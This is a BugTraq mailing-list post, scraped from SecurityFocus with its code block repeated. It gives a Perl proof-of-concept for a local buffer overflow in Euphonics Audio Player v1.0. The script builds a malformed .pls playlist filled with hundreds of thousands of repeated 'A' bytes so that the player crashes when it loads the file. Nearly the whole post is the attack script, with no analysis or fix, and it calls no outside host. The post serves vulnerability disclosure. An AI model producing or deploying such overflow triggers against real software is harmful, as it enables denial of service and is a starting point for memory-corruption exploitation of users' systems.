BugTraq
Back to list
|
Post reply
Euphonics Audio Player v1.0 (.pls) Local BOF POC
Feb 03 2009 11:16PM
darkb0x97 googlemail com
#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97 (at) googlemail (dot) com [email concealed]
my $file="dark.pls";
$accessviolation = "\x41\x41\x41\x41" x 408973 ;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $accessviolation ;
close($FILE);
print "$file creation finished";
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97 (at) googlemail (dot) com [email concealed]
my $file="dark.pls";
$accessviolation = "\x41\x41\x41\x41" x 408973 ;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $accessviolation ;
close($FILE);
print "$file creation finished";
[ reply ]